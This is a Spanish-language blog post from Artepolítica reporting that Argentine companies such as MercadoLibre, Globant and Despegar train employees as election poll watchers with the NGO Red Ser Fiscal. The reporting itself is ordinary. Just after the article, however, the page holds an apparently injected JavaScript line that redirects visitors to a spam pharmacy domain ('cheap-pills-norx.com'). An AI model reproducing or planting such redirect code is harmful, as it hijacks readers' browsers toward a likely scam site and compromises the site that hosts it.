Fiebre electoral: las empresas capacitan a sus empleados para que sean fiscales de mesa

También otorgan beneficios a los que deciden emprender esa tarea como tener libre el lunes posterior a la jornada de votación o viáticos para trasladarse hasta el lugar donde les corresponda desempeñarse. Se trata de una iniciativa de la ONG Red Ser Fiscal y varias compañías, entre ellas MercadoLibre, Globant y Despegar
No es común que las empresas se involucren en temas políticos. Sin embargo, este año algunas compañías decidieron ofrecer a sus empleados la posibilidad de capacitarse, durante su horario laboral y en sus oficinas, para ser fiscales en las próximas elecciones presidenciales. Se trata de una iniciativa de la ONG Red Ser Fiscal de la que ya participaron Mercado Libre, Globant, Despegar y uno de los principales bancos privados del país.
Los coordinadores de la organización ofrecen una capacitación dentro de las empresas para los empleados que decidan ser fiscales, sin importar el partido. Como compensación, reciben el beneficio de tomarse como «día libre» el lunes siguientes a las elecciones y, en algunos casos, viáticos para trasladarse hasta el lugar de fiscalización.
«Permite a los empleados potenciar su compromiso ciudadano ejerciendo su rol de fiscales. Como organización, tenemos una responsabilidad en apoyar la democracia y esto nos parece un buen vehículo», explicó Sebastián López Silva, vicepresidente de Recursos Humanos de MercadoLibre. La empresa se sumó al proyecto a través de Endeavor, una red a la que pertenece junto a otras compañías. Hasta el momento, más de 30 personas de la organización se sumaron a los talleres. En función del interés partidario de cada persona, la ONG los pone en contacto con el partido que corresponda, pero también se puede acceder sin intervención de la organización.
«La recepción del compromiso de la empresa en contribuir a construir la democracia fue muy positiva. Somos una compañía muy abierta, con una comunicación horizontal y fluida que permite que cada empleado se manifieste abiertamente», agregó López Silva. La empresa cuenta con más de 1000 empleados en la Argentina.
En Despegar, participaron unas 40 personas y hubo una «sobremesa» espontánea donde los empleados debatieron sobre política. En su mayoría, muy jóvenes, ya que la edad promedio de los colaboradores de la empresa es de 28 años.
«El tema de la transparencia electoral amerita que sea un capítulo dentro de la Responsabilidad Social Empresaria. Como organización, tenemos acuerdos con nueve fuerzas políticas, lo que nos aseguran que esos fiscales no sean por un determinado partido. Pero su el ciudadano opta por otro, se hace todo el mecanismo para que pueda fiscalizar para esa fuerza. Es una experiencia nueva y a través de las empresas encontramos un camino interesante», señaló Claudio Bargach, coordinador nacional de la red Ser Fiscal.
La ONG nació en 2007 y para las últimas elecciones lograron sumar a 45.000 fiscales voluntarios. Tienen acuerdos firmados con varios partidos, como PRO, Unión Cívica Radical (UCR), Partido Socialista, Coalición Cívica ARI, Movimiento Libres del Sur, Democracia Cristiana, Partido FE, Partido GEN y Unión por la Libertad.

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *